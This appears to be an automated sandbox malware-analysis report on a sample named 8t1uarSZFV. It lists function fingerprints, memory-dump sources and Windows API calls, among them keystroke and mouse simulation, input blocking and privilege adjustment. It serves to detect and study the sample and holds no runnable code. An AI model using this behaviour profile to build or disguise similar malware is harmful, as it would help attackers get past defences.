            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$CurrentExitTerminate
            • String ID:
            • API String ID: 1703294689-0
            • Opcode ID: e1d492e7fa919ba6d4091b4c02bab6813592c22a81e2ed3e6414b67866c19878
            • Instruction ID: fc25a572c4f75b259577b63241c3da15f631f70ebde4205ee437c8341d35e8d2
            • Opcode Fuzzy Hash: e1d492e7fa919ba6d4091b4c02bab6813592c22a81e2ed3e6414b67866c19878
            • Instruction Fuzzy Hash: ACE0BF31400149ABDF217F54DF1AF583B6DEB41751B144419FD45DA126CB3AEE51EB40
            APIs
            • GetUserNameW.ADVAPI32(?,?), ref: 00FFD28C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: NameUser
            • String ID: X64
            • API String ID: 2645101109-893830106
            • Opcode ID: ab4f3988c6cbcad51ffdeb9fb90b9f90d2428633e03c6585efff7b03ce5f68e4
            • Instruction ID: ff545a6b3440ba1498096d129733d51311b4e11739c5d792f44ec937d51f2436
            • Opcode Fuzzy Hash: ab4f3988c6cbcad51ffdeb9fb90b9f90d2428633e03c6585efff7b03ce5f68e4
            • Instruction Fuzzy Hash: 03D0C9B580111DEACB94DB90D888ED9B37CBB04345F100192F146E2000D73495489F10
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
            • Instruction ID: 8ba2cfa2e4869caf82e941a74a12b72854f971bdd9930a3c25e8296429f92022
            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
            • Instruction Fuzzy Hash: 61021C72E0021A9BDF14CFA9C981BADBBF1EF88324F25416DD919E7380D731A941DB94
            APIs
            • FindFirstFileW.KERNEL32(?,?), ref: 01016918
            • FindClose.KERNEL32(00000000), ref: 01016961
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Find$CloseFileFirst
            • String ID:
            • API String ID: 2295610775-0
            • Opcode ID: 1bc8370dd09e76952c5352094781c466dbffb482abe0e05066408fe7b348973f
            • Instruction ID: 92d730795b53fd7e43ca9b8c74366c1ae2fa22d68c697c6433cc3d6b87c30f80
            • Opcode Fuzzy Hash: 1bc8370dd09e76952c5352094781c466dbffb482abe0e05066408fe7b348973f
            • Instruction Fuzzy Hash: 3D1193716142109FD710DF29D884A16BBE5FF85328F04C699E4A98F2A6C779EC05CB91
            APIs
            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,01024891,?,?,00000035,?), ref: 010137E4
            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,01024891,?,?,00000035,?), ref: 010137F4
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorFormatLastMessage
            • String ID:
            • API String ID: 3479602957-0
            • Opcode ID: fd784ac278f60da774fcd16dc377cb202732253f8a879cd0316a701bb5519d03
            • Instruction ID: e06811f6955a32ed0cafa91343cca074e7b59bb48953af36204671d6a40dded8
            • Opcode Fuzzy Hash: fd784ac278f60da774fcd16dc377cb202732253f8a879cd0316a701bb5519d03
            • Instruction Fuzzy Hash: FAF0E5716043292AE730166A8C4DFEB3AAEFFC5771F0001B5F509E2285D9649904C7B0
            APIs
            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0100B25D
            • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0100B270
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: InputSendkeybd_event
            • String ID:
            • API String ID: 3536248340-0
            • Opcode ID: ba2d2b723a748eb2500a2ec741442ef1a1b31d530cb2954873f9a23c11eb4856
            • Instruction ID: 5260ada2c27d9d1669130b3b0e115ba51794334e70d8cf65393de0abe72817c1
            • Opcode Fuzzy Hash: ba2d2b723a748eb2500a2ec741442ef1a1b31d530cb2954873f9a23c11eb4856
            • Instruction Fuzzy Hash: D8F01D7580424DABEB169FA4C805BAE7FB4FF04305F00804AF995A5191C77982119F94
            APIs
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010011FC), ref: 010010D4
            • CloseHandle.KERNEL32(?,?,010011FC), ref: 010010E9
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AdjustCloseHandlePrivilegesToken
            • String ID:
            • API String ID: 81990902-0
            • Opcode ID: 5cb74248ac4fc8c7af3114dcf5c1da57d8e1eceaa405bd4473e7a5d347e8247d
            • Instruction ID: 9ad2a9b6f3f91dc6cb469b244f6ee2952d90a7377213ea06e01fcc75efa02df1
            • Opcode Fuzzy Hash: 5cb74248ac4fc8c7af3114dcf5c1da57d8e1eceaa405bd4473e7a5d347e8247d
            • Instruction Fuzzy Hash: 33E04F32004600AEF7252B11FD05EB37BEDEB04310F10882EF5E5804B5DB67ACA0EB10
            Strings
            • Variable is not of type 'Object'., xrefs: 00FF0C40
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: Variable is not of type 'Object'.
            • API String ID: 0-1840281001
            • Opcode ID: 311c38b67bd17d0221324373d9fc5728742104347562960aea9f18c2e4f78ae2
            • Instruction ID: d952f9af1dee73f9a0127c22f1dbc8e1353417abc16d6efafa48c586bd1486b7
            • Opcode Fuzzy Hash: 311c38b67bd17d0221324373d9fc5728742104347562960aea9f18c2e4f78ae2
            • Instruction Fuzzy Hash: 883269B5900218DFCF14DF90C980BEDB7B5BF06314F148059E916AB292DB79AE45EBA0
            APIs
            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FD6766,?,?,00000008,?,?,00FDFEFE,00000000), ref: 00FD6998
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ExceptionRaise
            • String ID:
            • API String ID: 3997070919-0
            • Opcode ID: 9420eb5232b2594d674bc267695045627096370db7deab6b1d9d04bab75b4f45
            • Instruction ID: 945ec2e7bacbd3523f3fdbc64ea8f30211899e8f9deb90c0196f42e4d09033be
            • Opcode Fuzzy Hash: 9420eb5232b2594d674bc267695045627096370db7deab6b1d9d04bab75b4f45
            • Instruction Fuzzy Hash: F9B15B32A106099FD715CF28C486B657BE1FF05364F298659E8D9CF3A2C739E981EB40
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID: 0-3916222277
            • Opcode ID: 699d5e8ba54ade9382d0569d5015c59091678f6013296df3d13c80defe01eb27
            • Instruction ID: 6c865d9f770e90e5b2731477aec5cb3c192cb0af8f5997ca1a807f1eeef426bd
            • Opcode Fuzzy Hash: 699d5e8ba54ade9382d0569d5015c59091678f6013296df3d13c80defe01eb27
            • Instruction Fuzzy Hash: F2125D75D00229DBCB24CF59C8807EEB7B5FF48710F14819AE949EB251EB749A81DF90
            APIs
            • BlockInput.USER32(00000001), ref: 0101EABD
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: BlockInput
            • String ID:
            • API String ID: 3456056419-0
            • Opcode ID: 01d21dc2446af02adf017a6080bedeae6c9f0dc14c0495b8a5a65694d8861f65
            • Instruction ID: cc415437bc202569828085256f7dbbe160af515b18805eac9deca81dfb160edb
            • Opcode Fuzzy Hash: 01d21dc2446af02adf017a6080bedeae6c9f0dc14c0495b8a5a65694d8861f65
            • Instruction Fuzzy Hash: 8EE01A762102049FD710EF69D804E9AB7E9AF99760F048416FC8AD7256DA78B8408BA1
            APIs
            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0100E37E
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: mouse_event
            • String ID:
            • API String ID: 2434400541-0
            • Opcode ID: 6354a90f3ee0168839facf3cea61172bcfcb21b980d2adce27c0e66caba4e067
            • Instruction ID: 799d41f694b2343745e1fe1711b5dbe9551f58f2963e4174dcbe899afc5a16c9
            • Opcode Fuzzy Hash: 6354a90f3ee0168839facf3cea61172bcfcb21b980d2adce27c0e66caba4e067
            • Instruction Fuzzy Hash: 90D05EF61982013DFABF0A3CCA2FF7A2F88E301581F44DF89B2C1F95C9D681A4444021
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00FC03EE), ref: 00FC09DA
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 063ea184c0c1640b6a37ddc992ae7baaccd52a48778b5ec3ac7e50db94a388b8
            • Instruction ID: 5c9f4b50d04c2be7da4ba455f3839c7237e81e6fb8bf25eeee3f75d9a281b49a
            • Opcode Fuzzy Hash: 063ea184c0c1640b6a37ddc992ae7baaccd52a48778b5ec3ac7e50db94a388b8
            • Instruction Fuzzy Hash:
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: 0
            • API String ID: 0-4108050209
            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
            • Instruction ID: 4c87e09ce3cdc147117899d6f0273eb967ceac16c15343bbea7e35d6c49fb67a
            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
            • Instruction Fuzzy Hash: B9516922E0C70757DB3875294B5BFBE63959B12360F28050DEA82C76C2C629DE06FF51
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: dcb04e44dcc166404a6040ca6063fba16d886accd0663e98e90a94fac40deaa0
            • Instruction ID: d5c3f8e2290c440c417266606962b1f43fa20974b08ac57be5a1363f6e68f226
            • Opcode Fuzzy Hash: dcb04e44dcc166404a6040ca6063fba16d886accd0663e98e90a94fac40deaa0
            • Instruction Fuzzy Hash: A1328A71E28F014ED733A534E9623356249AFB33D5F19C737F816B9A99EB29C4835200
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 93137bb8dc78820962103a7cb02ba4013dfe9933bedd54005a17f627b5d1be30
            • Instruction ID: c9fe939efc39d2d17e7e4ccd222864cf184bec6dcab5a81302b9c129d0088b5c
            • Opcode Fuzzy Hash: 93137bb8dc78820962103a7cb02ba4013dfe9933bedd54005a17f627b5d1be30
            • Instruction Fuzzy Hash: DC322A72E0416D8BCF24CE29C6906BE7BA1EF45320F284566D799DB6A5D234DC41FBC0
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 39378d4a85988fd470ca16b9f209b5ef43423662727b6eef7e69d259a184e017
            • Instruction ID: 11ab99626b8fb2efdb5d275fc5ade0203cb3b182abc35c1c28fa0b383dffb10a
            • Opcode Fuzzy Hash: 39378d4a85988fd470ca16b9f209b5ef43423662727b6eef7e69d259a184e017
            • Instruction Fuzzy Hash: 3A22D0B0E0060ADFDF14DF65CC41AAEB3B6FF45314F104129E816A7291EB3AAD15EB60
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3c5f953b073ab8d6981056b2991db263feff09f1b287af9725bd5e1e2671086d
            • Instruction ID: 8533019e5fdcb5d858ef0b361fab6b4ce64e609f1862e0343882db3924c42769
            • Opcode Fuzzy Hash: 3c5f953b073ab8d6981056b2991db263feff09f1b287af9725bd5e1e2671086d
            • Instruction Fuzzy Hash: BC02C6B1E00206EBDB14DF65DC81BAEB7B5FF44300F108169E8169B290EB75ED15EB90
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
            • Instruction ID: a357952154d70ec52bf13c53b4652c3e1c6119b1b68bac4957e68d49201082e3
            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
            • Instruction Fuzzy Hash: 9B9178739080A349D72946398676A7DFFE16A933B1319079DE4F3CA1C2EE20D574F620
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
            • Instruction ID: c219d4ea351ca8153daf3016f2935d54e14e4ce6deaea2faf1e38f53b75ac515
            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
            • Instruction Fuzzy Hash: BA9156736090A349DB2D42798675A3DFFE16A933B1319079DD4F2CA1C2FD24C975BA20
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7656e81515a01a7281f8420dec6c7a6ac4c5c4450d20214d240cced459788d67
            • Instruction ID: 02678067e4e45c4ac59fa5aef9c5417fb0571d1765f8633665897688a28a1343
            • Opcode Fuzzy Hash: 7656e81515a01a7281f8420dec6c7a6ac4c5c4450d20214d240cced459788d67
            • Instruction Fuzzy Hash: 6E615971A0870766DB38B9288F97FBE3394DF81770F14091DE842CB295D619AE42BF15
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0973c04de6f9b39b90b3a358a8d4340d20b0703cc5d98368e4ac4f15f8e21612
            • Instruction ID: e6a660097e046a0b095161f0fa3e62849de2e009e99d4b1b31857fae135634ea
            • Opcode Fuzzy Hash: 0973c04de6f9b39b90b3a358a8d4340d20b0703cc5d98368e4ac4f15f8e21612
            • Instruction Fuzzy Hash: 67615972E0870B67DA3879284B53FBF33949F42760F14095DE843DB281DA16AD42FE55
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
            • Instruction ID: e0c6c2541b6acde1506ec7a3b43e47a54a4506a569baa877e6c9027e168cb299
            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
